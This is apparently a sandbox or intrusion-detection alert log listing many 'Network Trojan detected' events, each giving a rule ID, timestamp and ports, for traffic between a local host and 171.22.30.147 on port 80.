            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498132025483 01/05/23-08:52:44.765886
            SID:2025483
            Source Port:80
            Destination Port:49813
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749820802825766 01/05/23-08:52:46.558490
            SID:2825766
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750079802024318 01/05/23-08:54:02.588823
            SID:2024318
            Source Port:50079
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750082802024313 01/05/23-08:54:03.532238
            SID:2024313
            Source Port:50082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749853802825766 01/05/23-08:52:56.960046
            SID:2825766
            Source Port:49853
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750082802024318 01/05/23-08:54:03.532238
            SID:2024318
            Source Port:50082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498912025483 01/05/23-08:53:07.291807
            SID:2025483
            Source Port:80
            Destination Port:49891
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749952802021641 01/05/23-08:53:25.200806
            SID:2021641
            Source Port:49952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749949802021641 01/05/23-08:53:24.361661
            SID:2021641
            Source Port:49949
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749704802025381 01/05/23-08:52:08.934535
            SID:2025381
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750032802025381 01/05/23-08:53:49.938594
            SID:2025381
            Source Port:50032
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749886802825766 01/05/23-08:53:05.845633
            SID:2825766
            Source Port:49886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749923802825766 01/05/23-08:53:17.329996
            SID:2825766
            Source Port:49923
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749726802024318 01/05/23-08:52:18.702884
            SID:2024318
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749821802021641 01/05/23-08:52:46.829983
            SID:2021641
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750059802024318 01/05/23-08:53:57.279795
            SID:2024318
            Source Port:50059
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749844802024318 01/05/23-08:52:54.549139
            SID:2024318
            Source Port:49844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750009802025381 01/05/23-08:53:42.368696
            SID:2025381
            Source Port:50009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750013802024318 01/05/23-08:53:43.455950
            SID:2024318
            Source Port:50013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750059802024313 01/05/23-08:53:57.279795
            SID:2024313
            Source Port:50059
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749844802024313 01/05/23-08:52:54.549139
            SID:2024313
            Source Port:49844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749827802025381 01/05/23-08:52:48.461129
            SID:2025381
            Source Port:49827
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750013802024313 01/05/23-08:53:43.455950
            SID:2024313
            Source Port:50013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749888802025381 01/05/23-08:53:06.392338
            SID:2025381
            Source Port:49888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749939802024313 01/05/23-08:53:21.632432
            SID:2024313
            Source Port:49939
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749890802021641 01/05/23-08:53:06.934564
            SID:2021641
            Source Port:49890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749939802024318 01/05/23-08:53:21.632432
            SID:2024318
            Source Port:49939
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498242025483 01/05/23-08:52:47.720430
            SID:2025483
            Source Port:80
            Destination Port:49824
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749974802025381 01/05/23-08:53:33.106432
            SID:2025381
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498022025483 01/05/23-08:52:41.721047
            SID:2025483
            Source Port:80
            Destination Port:49802
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750030802825766 01/05/23-08:53:49.383588
            SID:2825766
            Source Port:50030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749859802021641 01/05/23-08:52:58.622571
            SID:2021641
            Source Port:49859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749702802825766 01/05/23-08:52:08.155254
            SID:2825766
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498802025483 01/05/23-08:53:04.312009
            SID:2025483
            Source Port:80
            Destination Port:49880
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749956802825766 01/05/23-08:53:26.250117
            SID:2825766
            Source Port:49956
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749768802021641 01/05/23-08:52:30.564042
            SID:2021641
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749910802825766 01/05/23-08:53:13.740225
            SID:2825766
            Source Port:49910
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749735802825766 01/05/23-08:52:21.259701
            SID:2825766
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750063802825766 01/05/23-08:53:58.331391
            SID:2825766
            Source Port:50063
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750026802024318 01/05/23-08:53:48.341265
            SID:2024318
            Source Port:50026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749854802021641 01/05/23-08:52:57.240558
            SID:2021641
            Source Port:49854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750026802024313 01/05/23-08:53:48.341265
            SID:2024313
            Source Port:50026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749877802024313 01/05/23-08:53:03.433942
            SID:2024313
            Source Port:49877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749906802024313 01/05/23-08:53:12.686115
            SID:2024313
            Source Port:49906
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749948802825766 01/05/23-08:53:24.079081
            SID:2825766
            Source Port:49948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750003802021641 01/05/23-08:53:40.763519
            SID:2021641
            Source Port:50003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749877802024318 01/05/23-08:53:03.433942
            SID:2024318
            Source Port:49877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749929802021641 01/05/23-08:53:18.948979
            SID:2021641
            Source Port:49929
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498652025483 01/05/23-08:53:00.312861
            SID:2025483
            Source Port:80
            Destination Port:49865
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749906802024318 01/05/23-08:53:12.686115
            SID:2024318
            Source Port:49906
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749735802021641 01/05/23-08:52:21.259701
            SID:2021641
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750063802021641 01/05/23-08:53:58.331391
            SID:2021641
            Source Port:50063
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750021802024313 01/05/23-08:53:46.361205
            SID:2024313
            Source Port:50021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498542025483 01/05/23-08:52:57.330801
            SID:2025483
            Source Port:80
            Destination Port:49854
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749943802825766 01/05/23-08:53:22.718924
            SID:2825766
            Source Port:49943
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498432025483 01/05/23-08:52:54.345838
            SID:2025483
            Source Port:80
            Destination Port:49843
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750068802021641 01/05/23-08:53:59.646284
            SID:2021641
            Source Port:50068
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749907802024313 01/05/23-08:53:12.956728
            SID:2024313
            Source Port:49907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749901802024318 01/05/23-08:53:11.357263
            SID:2024318
            Source Port:49901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500402025483 01/05/23-08:53:52.223381
            SID:2025483
            Source Port:80
            Destination Port:50040
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749708802021641 01/05/23-08:52:10.789251
            SID:2021641
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749907802024318 01/05/23-08:53:12.956728
            SID:2024318
            Source Port:49907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749771802825766 01/05/23-08:52:31.374001
            SID:2825766
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749761802025381 01/05/23-08:52:28.591148
            SID:2025381
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749850802025381 01/05/23-08:52:56.172529
            SID:2025381
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499692025483 01/05/23-08:53:31.862339
            SID:2025483
            Source Port:80
            Destination Port:49969
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750030802021641 01/05/23-08:53:49.383588
            SID:2021641
            Source Port:50030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750062802825766 01/05/23-08:53:58.073723
            SID:2825766
            Source Port:50062
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749978802025381 01/05/23-08:53:34.155329
            SID:2025381
            Source Port:49978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500812025483 01/05/23-08:54:03.316072
            SID:2025483
            Source Port:80
            Destination Port:50081
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749883802025381 01/05/23-08:53:05.037332
            SID:2025381
            Source Port:49883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749889802025381 01/05/23-08:53:06.674333
            SID:2025381
            Source Port:49889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749724802025381 01/05/23-08:52:18.098497
            SID:2025381
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750069802021641 01/05/23-08:53:59.913079
            SID:2021641
            Source Port:50069
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749794802025381 01/05/23-08:52:39.439392
            SID:2025381
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749834802021641 01/05/23-08:52:50.512718
            SID:2021641
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749926802024318 01/05/23-08:53:18.143087
            SID:2024318
            Source Port:49926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750059802825766 01/05/23-08:53:57.279795
            SID:2825766
            Source Port:50059
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499282025483 01/05/23-08:53:18.757059
            SID:2025483
            Source Port:80
            Destination Port:49928
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749892802025381 01/05/23-08:53:07.470439
            SID:2025381
            Source Port:49892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749767802825766 01/05/23-08:52:30.299348
            SID:2825766
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749926802024313 01/05/23-08:53:18.143087
            SID:2024313
            Source Port:49926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749780802025381 01/05/23-08:52:35.511333
            SID:2025381
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749918802025381 01/05/23-08:53:15.920283
            SID:2025381
            Source Port:49918
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749808802024313 01/05/23-08:52:43.325468
            SID:2024313
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749987802025381 01/05/23-08:53:36.549688
            SID:2025381
            Source Port:49987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750043802825766 01/05/23-08:53:52.949985
            SID:2825766
            Source Port:50043
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750072802021641 01/05/23-08:54:00.683642
            SID:2021641
            Source Port:50072
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749713802024313 01/05/23-08:52:12.826844
            SID:2024313
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749808802024318 01/05/23-08:52:43.325468
            SID:2024318
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749897802024313 01/05/23-08:53:09.055046
            SID:2024313
            Source Port:49897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749705802025381 01/05/23-08:52:09.363911
            SID:2025381
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749857802825766 01/05/23-08:52:58.054307
            SID:2825766
            Source Port:49857
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749963802024313 01/05/23-08:53:30.141323
            SID:2024313
            Source Port:49963
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749897802024318 01/05/23-08:53:09.055046
            SID:2024318
            Source Port:49897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749963802024318 01/05/23-08:53:30.141323
            SID:2024318
            Source Port:49963
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498352025483 01/05/23-08:52:50.990352
            SID:2025483
            Source Port:80
            Destination Port:49835
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749823802025381 01/05/23-08:52:47.379297
            SID:2025381
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749910802024318 01/05/23-08:53:13.740225
            SID:2024318
            Source Port:49910
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749755802021641 01/05/23-08:52:26.961334
            SID:2021641
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749768802825766 01/05/23-08:52:30.564042
            SID:2825766
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749912802025381 01/05/23-08:53:14.329479
            SID:2025381
            Source Port:49912
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749910802024313 01/05/23-08:53:13.740225
            SID:2024313
            Source Port:49910
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499582025483 01/05/23-08:53:27.313519
            SID:2025483
            Source Port:80
            Destination Port:49958
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749793802025381 01/05/23-08:52:39.171445
            SID:2025381
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499392025483 01/05/23-08:53:21.712762
            SID:2025483
            Source Port:80
            Destination Port:49939
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500702025483 01/05/23-08:54:00.237420
            SID:2025483
            Source Port:80
            Destination Port:50070
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750006802825766 01/05/23-08:53:41.552586
            SID:2825766
            Source Port:50006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499172025483 01/05/23-08:53:15.716958
            SID:2025483
            Source Port:80
            Destination Port:49917
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749713802024318 01/05/23-08:52:12.826844
            SID:2024318
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749722802024313 01/05/23-08:52:17.506386
            SID:2024313
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749811802024318 01/05/23-08:52:44.140113
            SID:2024318
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749976802024313 01/05/23-08:53:33.629058
            SID:2024313
            Source Port:49976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749811802024313 01/05/23-08:52:44.140113
            SID:2024313
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749976802024318 01/05/23-08:53:33.629058
            SID:2024318
            Source Port:49976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749982802024313 01/05/23-08:53:35.215314
            SID:2024313
            Source Port:49982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749722802024318 01/05/23-08:52:17.506386
            SID:2024318
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749777802021641 01/05/23-08:52:34.550245
            SID:2021641
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749982802024318 01/05/23-08:53:35.215314
            SID:2024318
            Source Port:49982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750046802024313 01/05/23-08:53:53.748051
            SID:2024313
            Source Port:50046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749782802024318 01/05/23-08:52:36.098088
            SID:2024318
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749909802025381 01/05/23-08:53:13.489642
            SID:2025381
            Source Port:49909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497182025483 01/05/23-08:52:15.558526
            SID:2025483
            Source Port:80
            Destination Port:49718
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750046802024318 01/05/23-08:53:53.748051
            SID:2024318
            Source Port:50046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749782802024313 01/05/23-08:52:36.098088
            SID:2024313
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497292025483 01/05/23-08:52:19.632996
            SID:2025483
            Source Port:80
            Destination Port:49729
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750000802025381 01/05/23-08:53:39.996140
            SID:2025381
            Source Port:50000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749764802021641 01/05/23-08:52:29.472789
            SID:2021641
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749995802024313 01/05/23-08:53:38.676723
            SID:2024313
            Source Port:49995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749737802025381 01/05/23-08:52:21.818381
            SID:2025381
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750029802025381 01/05/23-08:53:49.112211
            SID:2025381
            Source Port:50029
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750027802024318 01/05/23-08:53:48.599181
            SID:2024318
            Source Port:50027
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497072025483 01/05/23-08:52:10.429352
            SID:2025483
            Source Port:80
            Destination Port:49707
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749995802024318 01/05/23-08:53:38.676723
            SID:2024318
            Source Port:49995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749853802021641 01/05/23-08:52:56.960046
            SID:2021641
            Source Port:49853
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749866802825766 01/05/23-08:53:00.520534
            SID:2825766
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750027802024313 01/05/23-08:53:48.599181
            SID:2024313
            Source Port:50027
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749778802024313 01/05/23-08:52:34.958959
            SID:2024313
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749968802021641 01/05/23-08:53:31.490288
            SID:2021641
            Source Port:49968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499842025483 01/05/23-08:53:35.825003
            SID:2025483
            Source Port:80
            Destination Port:49984
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749811802825766 01/05/23-08:52:44.140113
            SID:2825766
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500252025483 01/05/23-08:53:48.167670
            SID:2025483
            Source Port:80
            Destination Port:50025
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749873802021641 01/05/23-08:53:02.352866
            SID:2021641
            Source Port:49873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749778802024318 01/05/23-08:52:34.958959
            SID:2024318
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749906802825766 01/05/23-08:53:12.686115
            SID:2825766
            Source Port:49906
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749985802825766 01/05/23-08:53:36.027311
            SID:2825766
            Source Port:49985
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750030802024313 01/05/23-08:53:49.383588
            SID:2024313
            Source Port:50030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498102025483 01/05/23-08:52:43.945076
            SID:2025483
            Source Port:80
            Destination Port:49810
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499472025483 01/05/23-08:53:23.895642
            SID:2025483
            Source Port:80
            Destination Port:49947
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749735802024313 01/05/23-08:52:21.259701
            SID:2024313
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750030802024318 01/05/23-08:53:49.383588
            SID:2024318
            Source Port:50030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749745802024318 01/05/23-08:52:24.023320
            SID:2024318
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749939802825766 01/05/23-08:53:21.632432
            SID:2825766
            Source Port:49939
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749718802025381 01/05/23-08:52:15.464089
            SID:2025381
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749745802024313 01/05/23-08:52:24.023320
            SID:2024313
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499062025483 01/05/23-08:53:12.766427
            SID:2025483
            Source Port:80
            Destination Port:49906
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499082025483 01/05/23-08:53:13.297314
            SID:2025483
            Source Port:80
            Destination Port:49908
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750017802024313 01/05/23-08:53:44.537455
            SID:2024313
            Source Port:50017
            Destination Port:80
            Protocol:TCP
